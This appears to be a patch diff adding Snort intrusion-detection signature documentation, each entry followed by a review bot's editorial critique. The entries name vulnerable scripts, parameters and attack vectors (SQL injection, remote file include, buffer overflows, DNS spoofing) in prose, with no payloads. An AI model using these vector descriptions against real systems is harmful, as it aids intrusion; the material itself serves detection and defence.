+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "meaning.php" with SQL commands being passed as the "QuaranID" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "QuaranID" parameter in the "meaning.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
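Review bot: this file shares the same problems as 100000514.txt in this patch: the third Detailed Information paragraph is generic credential-validation text that does not describe SQL injection via the "QuaranID" parameter of "meaning.php" and should be dropped or rewritten, "running ona web server" should be "on a web server", "attackers choosing" should be "attacker's choosing", "exploitation attempt has been attempted" is redundant, and the "--" separators after Sid, Affected Systems and Contributors are missing the blank line the other files use.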
--- /dev/null
+++ b/doc/signatures/3357.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3357
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
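Review bot: Attack Scenarios describes "a request for a file with an overly long filename via a network share" while Detailed Information describes malformed data sent via RPC; as written the two sections read as different vectors. Spell out that the overly long filename is carried inside the DCOM activation request sent over RPC, so readers do not mistake this for an SMB file-share rule. Fix "Expoit code" to "Exploit code" in Ease of Attack, and Additional References is empty even though a Microsoft security bulletin exists for this issue and Corrective Action tells the reader to patch.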
--- /dev/null
+++ b/doc/signatures/2908.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2908
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repschema
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
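Review bot: same template artifact as 2815.txt: the procedure name "drop_snapshot_repschema" is followed by a line beginning ". This procedure is included in", so the sentence has a line break before its period; join it into "vulnerability in the procedure drop_snapshot_repschema. This procedure is included in sys.dbms_repcat_sna." "Oracle Oracle9i" duplicates the vendor name, headers and separators carry trailing whitespace, and Additional References is empty although Corrective Action refers to a vendor patch.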
--- /dev/null
+++ b/doc/signatures/100000375.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000375
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_avatar.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_avatar.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
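Review bot: the third paragraph of Detailed Information and the Attack Scenarios paragraph are the generic CGI credential boilerplate ("An attacker can access an authentication mechanism and supply his/her own credentials") and do not describe a remote file include; for this rule the scenario is an unauthenticated request to admin_avatar.php with phpbb_root_path set to a URL on an attacker-controlled host, so the script includes and executes the attacker's PHP as the web server user. "may indicate that an exploitation attempt has been attempted" is redundant, and "ona web server" should be "on a web server". Corrective Action should add that setting allow_url_fopen (and allow_url_include on PHP 5.2 and later) to Off in php.ini blocks remote includes regardless of the application version, and False Positives should say whether the rule requires a scheme such as "http://" in the parameter, since that determines how often ordinary traffic trips it.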
--- /dev/null
+++ b/doc/signatures/2090.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2090
+
+--
+Summary:
+servers is used.
+
+--
+Impact:
+System compromise, web site defacement, loss of data, execution of code.
+
+--
+Detailed Information:
+A vulnerability exists in a component used by the Microsoft Internet 
+Information Server 5.0 implementation of WebDAV. A specially crafted 
+overly long URI when processed by the server, triggers a buffer overflow
+in ntdll.dll which results in a system compromise of the targeted host.
+
+The exploit only affects versions of IIS 5.0 running on Microsoft 
+Windows 2000 prior to service pack 3. WebDAV is enabled by default on 
+that platform.
+
+used against a target server.
+
+--
+Affected Systems:
+Microsoft Internet Information Server 5.0 WebDAV on Windows 2000 prior 
+to Service Pack 3.
+
+--
+Attack Scenarios:
+The attacker is using a publicly available exploit script.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch or service pack.
+
+Disable WebDAV services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-09.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0109
+
+Bugtraq:
+http://www.securityfocus.com/bid/7116
+
+Microsoft Corporation:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-007.asp
+http://www.microsoft.com/security/security_bulletins/ms03-007.asp
+
+--
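Review bot: the Summary is a fragment ("servers is used.") and the line "used against a target server." further down is another orphaned sentence tail; the sentences they belonged to are missing and need to be restored before this ships. The scoping in Detailed Information ("only affects versions of IIS 5.0 running on Microsoft Windows 2000 prior to service pack 3") contradicts the referenced CA-2003-09 and MS03-007, which cover Windows 2000 up to and including SP3 (the patch was issued for SP2 and SP3 and rolled into SP4), so Affected Systems should read "Service Pack 3 and earlier". Since the overflow is in ntdll.dll rather than in IIS, it is worth stating that WebDAV is the exposed vector, not the flawed component. The CVE link uses the retired candidate name CAN-2003-0109; the identifier is now CVE-2003-0109, and both Microsoft URLs are stale.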
--- /dev/null
+++ b/doc/signatures/2026.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+2026
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0779
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Bugtraq:
+http://www.securityfocus.com/bid/2763
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
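Review bot: the NIS component names are wrong throughout: the client command is yppasswd and the server daemon is rpc.yppasswdd, but the text uses "ypasswd" and "rpc.ypasswd" in the Summary, Detailed Information, Attack Scenarios and Corrective Action, so an analyst grepping process listings or man pages will not find them. "pacthes" should be "patches". The "two instances of inetd" and "root shell attached to port 77" details describe one public exploit rather than the vulnerability; label them as indicators from that exploit so a compromise that used a different payload is not discounted. Corrective Action should point to the vendor patches referenced by CERT VU#327281 rather than just "patches for the affected systems".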
--- /dev/null
+++ b/doc/signatures/1457.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1457
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Blackboard CourseInfo running on  a web server. 
+
+Any valid user is able to modify the contents of the database by
+supplying form values of their choosing to the perl scripts running the
+application.
+
+--
+Affected Systems:
+	Blackboard CourseInfo 4.0 for UNIX and Windws NT
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade the application to the latest non-affected version of the
+software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
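Review bot: the Attack Scenarios paragraph ("An attacker can access the authentication mechanism and supply his/her own credentials") is boilerplate that does not match the vulnerability described in Detailed Information, where any valid user alters the database by submitting unchecked form values to the CourseInfo Perl scripts; rewrite the scenario as an authenticated user posting crafted form fields. "Windws NT" should be "Windows NT" and there is a double space in "running on  a web server". Additional References is empty; add the Bugtraq or vendor entry the rule's reference keyword carries so the analyst has something to check the alert against.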
--- /dev/null
+++ b/doc/signatures/868.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+868
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
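Review bot: the description never names the CGI the rule actually matches, and the entire body is shared generic text (the same paragraphs appear verbatim in 1720.txt and 1451.txt in this patch), so an analyst has no URI, script name or reference to triage the alert against. State which script the rule's content match looks for and add the corresponding reference. "running ona web server" should be "running on a web server".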
--- /dev/null
+++ b/doc/signatures/100000708.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000708
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SmartSiteCMS" application running on a webserver. Access to the file "comedit.php" using a remote file being passed as the "root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root" parameter in the "comedit.php" script used by the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
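Review bot: the same template defects as the other remote file include entries in this patch: "ona web server" in Detailed Information, "an exploitation attempt has been attempted" in the Summary, and an Attack Scenarios paragraph about supplying credentials that does not describe the actual attack (a request to comedit.php with root pointing at a URL on the attacker's host, so the attacker's PHP is included and run as the web server user). The blank line before "--" is missing after the Sid, Affected Systems and Contributors blocks, unlike every other entry. Corrective Action should add that allow_url_fopen and allow_url_include set to Off in php.ini stop remote includes independently of the application version.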
--- /dev/null
+++ b/doc/signatures/1659.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1659
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
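Review bot: the text does not say which ColdFusion path or component the rule matches, and "the attack scenarios are legion" gives the analyst nothing to act on; name the matched URI and add a reference. "Affected Systems: All systems running ColdFusion" is too broad if the rule targets a specific administrative or sample script. "Coldfusion" in Detailed Information should be "ColdFusion" as in the Summary.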
--- /dev/null
+++ b/doc/signatures/2210.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2210
+
+--
+Summary:
+This event is generated when an attempt is made to access global.cgi on an internal server. This may indicate an attempt to exploit an arbitrary command execution vulnerability in Global 3.55 on NetBSD.
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+Global is a source code tagging system for NetBSD. Versions 3.55 and earlier contain a vulnerability where commands sent to global.cgi are improperly parsed, allowing attackers to execute arbitrary code with the security context of the web server.
+
+--
+Affected Systems:
+Systems running Global 3.55 or lower on NetBSD.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to global.cgi on a vulnerable web server. The web server then attempts to execute the commands included in the URL.
+
+--
+Ease of Attack:
+Simple. Proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses global.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Global 4.01 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/1854
+
+--
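Review bot: "Global is a source code tagging system for NetBSD" is wrong; GNU GLOBAL is a cross-platform source tag system, and NetBSD is only the platform whose advisory and package were referenced, so "Affected Systems: Systems running Global 3.55 or lower on NetBSD" should be any web server exposing global.cgi from GLOBAL 3.55 or earlier. "commands sent to global.cgi are improperly parsed" should state the actual flaw: the request string reaches a shell without sanitising, so shell metacharacters in the query run as the web server user (BID 1854 describes it this way). Corrective Action could add removing global.cgi from the web root where the CGI search front end is not needed.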
--- /dev/null
+++ b/doc/signatures/2046.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2046
+
+--
+Summary:
+The IMAP daemon distributed by Washington University (Wu-imapd) is
+subject to a buffer overflow condition which may result in a denial of service.
+
+--
+Impact:
+Possible code execution and Denial of Service.
+
+--
+Detailed Information:
+If a valid user of an IMAP service using wu-imapd makes a partial
+request of mailbox attributes, a buffer overflow occurs in the daemon
+resulting in the crash of the process.
+
+Execution of arbitrary code may be possible with the privileges of the
+user running imapd.
+
+Exploits are widely available for this vulnerability.
+
+--
+Affected Systems:
+	Washington University wu-imapd 2000.0 c
+	Washington University wu-imapd 2000.0 b
+	Washington University wu-imapd 2000.0 a
+	Washington University wu-imapd 2000.0
+	Washington University wu-imapd 2001.0 a
+	Washington University wu-imapd 2001.0
+
+--
+Attack Scenarios:
+The attacker could use one of the available exploits or when logged in 
+as a valid user, make a partial request for the mailbox attributes.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the affected systems.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
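Review bot: the Summary says the overflow "may result in a denial of service" while Impact and Detailed Information say arbitrary code execution; align them. Additional References is empty; the partial mailbox attribute (BODY) overflow in wu-imapd 2000 and 2001 is CVE-2002-0379, so add that and the Bugtraq entry. "Ease of Attack: Simple" should note the precondition already given in Detailed Information, that the attacker must hold valid IMAP credentials, because a post-authentication alert is triaged differently (identify which account authenticated on that session).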
--- /dev/null
+++ b/doc/signatures/253.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+253
+
+--
+Summary:
+This event is generated when a specific DNS response. In this case, there are no DNS authority records for the queried pointer record and has a DNS time-to-live value of one minute. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This is presumably from an attacker engaged in a race condition to respond to a legitimate DNS query.  An attacker may sniff a DNS query requesting an address record and attempt to respond before an actual DNS server can.  The spoofed response is atypical because it does not include the authoritative DNS servers in the returned record.  A legitimate DNS response will likely return the names of the authoritative DNS servers.  The response associated with this traffic has a DNS time-to-live value of one minute.  It is suspected that the TTL is set to expire quickly to eliminate any evidence of the spoofed response.
+
+--
+Affected Systems:
+Any DNS server not using DNSSEC.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Moderate. The attacker has to be able to sniff DNS queries and generate spoofed responses before the actual DNS server.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+This rule uses very specific DNS flag values that could be modified.  Also, if the DNS TTL value is changed from 1, this rule will not trigger.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
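Review bot: the Summary has no main verb ("This event is generated when a specific DNS response.") and calls the record a "pointer record" while Detailed Information talks about "an address record"; pick the record type the rule matches. "False Positives: None Known." is not credible: legitimate authoritative servers and resolvers routinely return answers with a 60 second TTL and no authority section (minimal-responses configurations do exactly this), so the only real discriminator is that the forged answer arrives before the genuine one, and the rule cannot see that; say the false positive rate is high and that the alert needs correlation with a second, differing answer for the same query. "Affected Systems: Any DNS server not using DNSSEC" mislocates the victim; the party misdirected is the resolver or client that accepts the spoofed answer.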
--- /dev/null
+++ b/doc/signatures/990.txt
@@ -0,0 +1,54 @@
+Can't find affected system versions
+Rule:
+
+--
+Sid:
+990
+
+--
+Summary:
+This event is generated when an attempt is made to access a file with '_vti_inf' in the name.
+
+--
+Impact:
+Information gathering.  This attack can leak the version number and scripting paths of Microsoft FrontPage.
+
+--
+Detailed Information:
+Microsoft FrontPage provides software for web designers to generate and administer web pages.  The file '_vti_inf.html' contains FrontPage configuration information of version number and scripting paths that is normally used by a FrontPage client to communicate with the server.  An attacker can craft a URL to access this file to disclose the version number and scripting paths.
+
+--
+Affected Systems:
+???
+
+--
+Attack Scenarios:
+An attacker can craft a URL to access the '_vti_inf' file to learn the version and scripting paths of FrontPage.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply patches and upgrade to most current version of FrontPage.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
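Review bot: "Can't find affected system versions" at the top of the file and "???" under Affected Systems are author notes left in shipped documentation; replace them with "Any web server with FrontPage Server Extensions installed", since _vti_inf.html is created by the server extensions, not by a client version. "False Positives: None Known." is wrong: the FrontPage client requests _vti_inf.html at the start of every authoring connection, so any site legitimately edited with FrontPage will raise this alert; say so and suggest limiting the rule to external sources.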
--- /dev/null
+++ b/doc/signatures/1319.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1319
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "real snuff".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "real snuff".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
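Review bot: "This rule indicates that a webpage was visited the included the content" should read "that included the string"; the blank line between "Sid:" and the number and the run of empty lines after "Additional References:" are formatting noise compared with the other entries. The False Positives text could also say that this is a content policy rule matching the HTTP response body, so the same phrase in a news article fires it just as the Snort rule documentation does.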
--- /dev/null
+++ b/doc/signatures/1160.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1160
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
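Review bot: like 868.txt in this patch, the entry is entirely generic and never says what the rule matches; "Many known vulnerabilities exist for each implementation and the attack scenarios are legion" gives the analyst nothing to check against the alert. Add the matched URI or script name and a reference, and narrow "All systems using a web server" to the server or application the rule targets.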
--- /dev/null
+++ b/doc/signatures/100000632.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000632
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "summary.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
